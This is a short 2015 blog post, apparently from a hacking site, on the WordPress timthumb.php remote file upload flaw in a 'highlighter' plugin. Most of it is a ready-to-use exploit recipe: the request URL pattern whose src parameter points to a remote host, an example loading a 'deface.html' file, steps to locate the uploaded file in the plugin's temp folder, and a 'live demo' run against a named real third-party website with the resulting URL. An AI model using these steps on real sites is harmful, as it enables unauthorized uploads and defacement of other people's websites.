Monday, 28 September 2015

wordpress timthumb remote file upload Vulnerability

in this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploithttp://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example :  http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html

Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html

Liked Post ? leave a Comment :)

2 comments:
Write comments
  1. This comment has been removed by a blog administrator.

    ReplyDelete
  2. This comment has been removed by a blog administrator.

    ReplyDelete

Get Updates about Latest Hacks, Exploits, Applications and Softwares. http://www.devilscafe.in/
Join Our Newsletter